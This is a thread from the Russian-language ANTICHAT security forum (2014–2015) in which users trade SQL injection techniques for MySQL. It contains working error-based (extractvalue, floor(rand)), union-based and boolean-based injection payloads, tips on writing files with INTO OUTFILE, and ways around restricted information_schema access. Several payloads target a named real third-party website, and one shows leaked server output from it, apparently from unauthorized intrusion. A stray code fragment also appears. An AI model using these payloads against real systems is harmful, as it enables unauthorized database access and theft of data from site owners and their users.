ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.12.2014, 00:04
|
|
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077
Репутация:
438
|
|
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
Код:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней? |
|
|
30.12.2014, 00:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от x_Lex
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , найдена инъекция
Код:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
? 1. select table_name form information_schema.tables limit 1
2. За сколько акк купили
|
|
|
|
30.12.2014, 00:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
select table_name from information_schema.tables limit 1,1 вместо select version()
с такими вопросами вам лучше сначала почитать статьи
|
|
|
|
30.12.2014, 04:14
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от GroM88
я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.
прочитал php.ini
magic_quotes=off
так что кавычки врятли тут роль играют)
Ну во первых, как советуют выкинь Хавидж и сделай вручную.
К тому же переведи в HEX колонку к виду 0x0000000 и
SELECT 0x0000 INTO OUTFILE /path
К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ
|
|
|
|
31.12.2014, 03:30
|
|
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077
Репутация:
438
|
|
Сообщение от UXOR
Сообщение от x_Lex
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
Код:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
? 1. select table_name form information_schema.tables limit 1
2. За сколько акк купили
" if author else f"
UXOR said:
Сообщение от x_Lex
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
Код:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
? 1. select table_name form information_schema.tables limit 1
2. За сколько акк купили
Сообщение от faza02
select table_name from information_schema.tables limit 1,1 вместо select version()
с такими вопросами вам лучше сначала почитать статьи
а блин забыл упомянуть что нет доступа с базе information_schema
|
|
|
|
31.12.2014, 09:04
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от vikler
Нестандартная скула - результат пост-запроса. В общем, как дальше быть? Или ничего нельзя сделать?
Код:
http:// www.f avorite-picture. com/pictures/search/ffffff.html
=>
Код:
http:// www.f avorite-picture. com/pictures/search/ffffff'.html
Какого пост-запроса?
Стандартгая ситуация у Вас, вектор - error based:
Сообщение от None
http://www.favorite-picture.com/pictures/search/ffffff'*(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a)*'.html
|
|
|
|
31.12.2014, 09:56
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от vikler
Нестандартная скула - результат пост-запроса. В общем, как дальше быть? Или ничего нельзя сделать?
Код:
http:// www.f avorite-picture. com/pictures/search/ffffff.html
=>
Код:
http:// www.f avorite-picture. com/pictures/search/ffffff'.html
+ к посту YaBtr
Заменяем пробелы на %20
Union Based
http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html
http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%20@@version,222%23 .html
Boolean Based
http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html
http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html
Error Based Classic
http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201 %20union%20select%202%20union%20select%203)x%20gro up%20by%20concat(version(),floor(rand(0)*2)))%23.h tml
Duplicate entry ' 5.5.38-0+wheezy11'
|
|
|
|
31.12.2014, 15:21
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от x_Lex
а блин забыл упомянуть что нет доступа с базе information_schema
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
|
|
|
|
31.12.2014, 21:51
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от x_Lex
а блин забыл упомянуть что нет доступа с базе information_schema
Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
|
|
|
|
01.01.2015, 19:31
|
|
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
Провел на форуме:
2186077
Репутация:
438
|
|
Сообщение от faza02
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
Сообщение от Cennarios
Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
